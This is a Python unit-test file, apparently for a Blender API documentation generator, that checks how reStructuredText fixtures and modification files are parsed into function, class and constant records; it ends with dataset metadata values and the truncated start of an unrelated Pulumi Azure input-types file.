function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1=[[1.3, -3.4], [4.5, -0.9]]"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_2",
"description": "function_2 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_2 arg_1 description",
"data_type": "function_2 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_2 arg_2 description",
"data_type": "str",
}],
"return": {
"type": "return",
"description": "",
"data_type": "",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_invalid_rst_format_1(self):
rst_files = ["invalid_rst_format_1.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
with self.assertRaises(ValueError):
result = analyzer.analyze(rst_files)
self.log(json.dumps(result.section_info[0].to_dict(), indent=4))
def test_invalid_rst_format_2(self):
rst_files = ["invalid_rst_format_2.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
with self.assertRaises(ValueError):
result = analyzer.analyze(rst_files)
self.log(json.dumps(result.section_info[0].to_dict(), indent=4))
def test_no_module(self):
rst_files = ["no_module.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_bpy_290_tweak(self):
rst_files = ["bpy_290_tweak.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
analyzer.set_blender_version("2.90")
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "bpy.types",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "bpy.types",
"data_type": "attr_1 type",
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_bge_support(self):
rst_files = ["bge_support.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
analyzer.enable_bge_support()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}]
}, method='NEW')
section_info.add_info(function_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_bge_support_no_module(self):
rst_files = ["bge.types.NoModule.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
analyzer.enable_bge_support()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "bge.types",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}]
}, method='NEW')
section_info.add_info(function_info)
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "bge.types",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "bge.types",
"data_type": "attr_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "bge.types",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_multiple_sections(self):
rst_files = ["single_constant.rst", "single_function.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
analyzer = BaseAnalyzer()
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 2)
self.log("First section:")
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
self.log("Second section:")
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
},
{
"type": "parameter",
"name": "arg_3",
"description": "function_1 arg_3 description",
"data_type": "function_1 arg_3 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[1].to_dict(),
section_info.to_dict())
class AnalyzerWithModFileTest(common.FakeBpyModuleTestBase):
name = "AnalyzerWithModFileTest"
module_name = __module__
data_dir = os.path.abspath("{}/analyzer_test_data".format(os.path.dirname(__file__)))
def setUp(self):
super().setUp()
def tearDown(self):
super().tearDown()
def compare_dict_and_log(self, d1, d2):
json1 = json.dumps(d1, indent=4).split("\n")
json2 = json.dumps(d2, indent=4).split("\n")
diff = difflib.unified_diff(json1, json2)
self.log("\n".join(diff))
def test_remove_constant(self):
rst_files = ["multiple_constants.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["remove_constant.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_remove_function(self):
rst_files = ["multiple_functions.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["remove_function.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}]
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_remove_class(self):
rst_files = ["multiple_classes.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["remove_class.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"base_classes": [
"BaseClass1",
"BaseClass2",
],
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": [],
"parameter_details": [],
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_new_constant(self):
rst_files = ["single_constant.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["new_constant.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 2)
self.log("First section:")
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"module": "module.a",
"description": "DATA_1 description",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
self.log("Second section:")
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"module": "module.a",
"description": "DATA_2 description",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[1].to_dict(),
section_info.to_dict())
def test_new_function(self):
rst_files = ["single_function.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["new_function.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 2)
self.log("First section:")
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\"", "arg_3=1234"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
},
{
"type": "parameter",
"name": "arg_3",
"description": "function_1 arg_3 description",
"data_type": "function_1 arg_3 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
self.log("Second section:")
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_2",
"description": "function_2 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2=TEST"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_2 arg_1 description",
"data_type": "function_2 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_2 arg_2 description",
"data_type": "function_2 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_2 return description",
"data_type": "function_2 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[1].to_dict(),
section_info.to_dict())
def test_new_class(self):
rst_files = ["single_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["new_class.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 2)
self.log("First section:")
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
},
{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=123"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "classmethod_1 arg_2 description",
"data_type": "classmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "classmethod_1 return description",
"data_type": "classmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "staticmethod_1 return description",
"data_type": "staticmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "function_1",
"description": "function_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=MAX_INT"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
self.log("Second section:")
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassB",
"module": "module.a",
"description": "ClassB description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassB",
"module": "module.a",
"data_type": "attr_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": [],
"parameter_details": [],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
}]
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassB",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}]
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[1].to_dict(),
section_info.to_dict())
def test_append_constant(self):
rst_files = ["multiple_constants.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["append_constant.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"description": "DATA_1 description",
"module": "module.a",
"data_type": "DATA_1 type",
}, method='NEW')
section_info.add_info(variable_info)
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_2",
"module": "module.a",
"data_type": "DATA_2 type",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_append_function(self):
rst_files = ["multiple_functions.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["append_function.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description",
"module": "module.a",
"parameters": ["arg_1", "arg_2"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "method_1",
"description": "method_1 description",
"module": "module.a",
"parameters": ["arg_1=10"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_append_class(self):
rst_files = ["single_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["append_class.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type",
},
{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "data_1 type",
},
{
"name": "attr_2",
"type": "attribute",
"description": "attr_2 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_2 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=123"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "classmethod_1 arg_2 description",
"data_type": "classmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "classmethod_1 return description",
"data_type": "classmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "staticmethod_1 return description",
"data_type": "staticmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "function_1",
"description": "function_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=MAX_INT"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
},
{
"name": "method_2",
"type": "function",
"description": "method_2 description",
"module": "module.a",
"parameters": ["arg_1"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_2 arg_1 description",
"data_type": "method_2 arg_1 type",
}],
"return": {
"type": "return",
"description": "method_2 return description",
"data_type": "method_2 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_update_constant(self):
rst_files = ["single_constant.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["update_constant.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
variable_info = VariableInfo("constant")
variable_info.from_dict({
"type": "constant",
"name": "DATA_1",
"module": "module.a",
"description": "DATA_1 description",
"data_type": "DATA_1 type updated",
}, method='NEW')
section_info.add_info(variable_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_update_function(self):
rst_files = ["single_function.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["update_function.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
function_info = FunctionInfo("function")
function_info.from_dict({
"type": "function",
"name": "function_1",
"description": "function_1 description updated",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test\"", "arg_3=12345"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description updated",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
},
{
"type": "parameter",
"name": "arg_3",
"description": "function_1 arg_3 description",
"data_type": "function_1 arg_3 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type updated",
}
}, method='NEW')
section_info.add_info(function_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
def test_update_class(self):
rst_files = ["single_class.rst"]
rst_files = ["{}/{}".format(self.data_dir, f) for f in rst_files]
mod_files = ["update_class.mod"]
mod_files = ["{}/{}".format(self.data_dir, f) for f in mod_files]
analyzer = AnalyzerWithModFile(mod_files)
result = analyzer.analyze(rst_files)
self.assertEqual(len(result.section_info), 1)
section_info = SectionInfo()
class_info = ClassInfo()
class_info.from_dict({
"type": "class",
"name": "ClassA",
"module": "module.a",
"description": "ClassA description updated",
"attributes": [{
"type": "attribute",
"name": "attr_1",
"description": "attr_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "attr_1 type updated",
},
{
"type": "attribute",
"name": "data_1",
"description": "data_1 description",
"class": "ClassA",
"module": "module.a",
"data_type": "data_1 type",
}],
"methods": [{
"type": "method",
"name": "method_1",
"description": "method_1 description updated",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=\"test2\""],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "method_1 arg_1 description",
"data_type": "method_1 arg_1 type updated",
},
{
"type": "parameter",
"name": "arg_2",
"description": "method_1 arg_2 description",
"data_type": "method_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "method_1 return description updated",
"data_type": "method_1 return type",
}
},
{
"type": "classmethod",
"name": "classmethod_1",
"description": "classmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=123"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "classmethod_1 arg_1 description",
"data_type": "classmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "classmethod_1 arg_2 description",
"data_type": "classmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "classmethod_1 return description",
"data_type": "classmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "staticmethod_1",
"description": "staticmethod_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=(0, 0)"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "staticmethod_1 arg_1 description",
"data_type": "staticmethod_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "staticmethod_1 arg_2 description",
"data_type": "staticmethod_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "staticmethod_1 return description",
"data_type": "staticmethod_1 return type",
}
},
{
"type": "staticmethod",
"name": "function_1",
"description": "function_1 description",
"class": "ClassA",
"module": "module.a",
"parameters": ["arg_1", "arg_2=MAX_INT"],
"parameter_details": [{
"type": "parameter",
"name": "arg_1",
"description": "function_1 arg_1 description",
"data_type": "function_1 arg_1 type",
},
{
"type": "parameter",
"name": "arg_2",
"description": "function_1 arg_2 description",
"data_type": "function_1 arg_2 type",
}],
"return": {
"type": "return",
"description": "function_1 return description",
"data_type": "function_1 return type",
}
}]
}, method='NEW')
section_info.add_info(class_info)
self.compare_dict_and_log(result.section_info[0].to_dict(),
section_info.to_dict())
| 35.680061
| 89
| 0.469044
| 6,229
| 70,147
| 4.997592
| 0.021833
| 0.080951
| 0.063476
| 0.044973
| 0.972984
| 0.967331
| 0.962801
| 0.962191
| 0.958336
| 0.956087
| 0
| 0.019821
| 0.396567
| 70,147
| 1,965
| 90
| 35.698219
| 0.715609
| 0
| 0
| 0.857555
| 0
| 0.000577
| 0.293313
| 0.004106
| 0
| 0
| 0
| 0
| 0.017878
| 1
| 0.020761
| false
| 0
| 0.00346
| 0
| 0.028835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86cbad315b39f630c07d3238693f37baadea5815
| 11,121
|
py
|
Python
|
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appconfiguration/_inputs.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ConfigurationStoreIdentityArgs',
'ConfigurationStorePrimaryReadKeyArgs',
'ConfigurationStorePrimaryWriteKeyArgs',
'ConfigurationStoreSecondaryReadKeyArgs',
'ConfigurationStoreSecondaryWriteKeyArgs',
]
@pulumi.input_type
class ConfigurationStoreIdentityArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
identity_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
principal_id: Optional[pulumi.Input[str]] = None,
tenant_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: Specifies the type of Managed Service Identity that should be configured on this API Management Service. Possible values are `SystemAssigned`, `UserAssigned`, `SystemAssigned, UserAssigned` (to enable both).
:param pulumi.Input[Sequence[pulumi.Input[str]]] identity_ids: A list of IDs for User Assigned Managed Identity resources to be assigned.
:param pulumi.Input[str] principal_id: The ID of the Principal (Client) in Azure Active Directory.
:param pulumi.Input[str] tenant_id: The ID of the Azure Active Directory Tenant.
"""
pulumi.set(__self__, "type", type)
if identity_ids is not None:
